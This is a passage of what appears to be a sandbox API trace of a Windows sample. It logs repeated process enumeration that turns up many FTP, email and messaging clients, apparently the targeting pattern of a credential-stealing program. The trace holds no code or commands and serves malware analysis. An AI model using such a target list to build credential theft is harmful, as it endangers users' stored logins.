lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xafc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0089.235] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0089.240] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="unit.exe")) returned 1 [0089.242] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="military mission finish.exe")) returned 1 [0089.244] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0089.246] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0089.248] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0089.250] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0089.252] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb3c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0089.254] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0089.256] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0089.258] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0089.260] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0089.261] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0089.263] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0089.284] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x248, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0089.286] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0089.288] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe08, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0089.290] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe08, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 0 [0089.292] CloseHandle (hObject=0x6d4) returned 1 [0089.292] Sleep (dwMilliseconds=0x64) [0089.391] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x6d4 [0089.402] Process32First (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0089.404] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0089.406] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0089.408] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x14c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0089.411] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0089.413] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x168, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0089.415] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x168, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0089.417] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x170, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0089.419] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0089.421] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0089.423] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0089.425] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x28c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0089.427] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0089.431] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0089.433] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x34, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0089.435] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0089.437] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x23, th32ParentProcessID=0x35c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0089.439] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x41c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x32c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0089.441] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x454, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0089.443] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0089.445] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0089.447] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x530, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0089.450] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0089.452] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1c8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0089.454] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0089.456] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x450, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x248, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0089.458] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0089.460] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x82c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x53c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0089.462] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x944, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="shoot_decade_effect.exe")) returned 1 [0089.464] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x94c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="at_effort.exe")) returned 1 [0089.466] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="state.exe")) returned 1 [0089.476] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x95c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="four.exe")) returned 1 [0089.478] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x964, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="treatmentabout.exe")) returned 1 [0089.480] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x96c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="treat.exe")) returned 1 [0089.482] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x974, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="quickly_mention_learn.exe")) returned 1 [0089.484] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x97c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="offer_shot.exe")) returned 1 [0089.486] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x984, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="total.exe")) returned 1 [0089.488] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x98c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="few.exe")) returned 1 [0089.490] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x998, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="our-available-watch.exe")) returned 1 [0089.492] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="reality.exe")) returned 1 [0089.494] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="surface.exe")) returned 1 [0089.496] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="wrong.exe")) returned 1 [0089.498] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="future employee.exe")) returned 1 [0089.500] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="minute-majority-recognize.exe")) returned 1 [0089.503] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="land-be-area.exe")) returned 1 [0089.505] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="focus_memory_base.exe")) returned 1 [0089.507] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="mrus.exe")) returned 1 [0089.509] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0089.511] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0089.517] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0089.519] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0089.521] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0089.523] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0089.525] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0089.527] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0089.529] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0089.531] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0089.534] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbfc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0089.536] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0089.538] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0089.541] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0089.543] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0089.546] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x584, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0089.548] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0089.551] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: 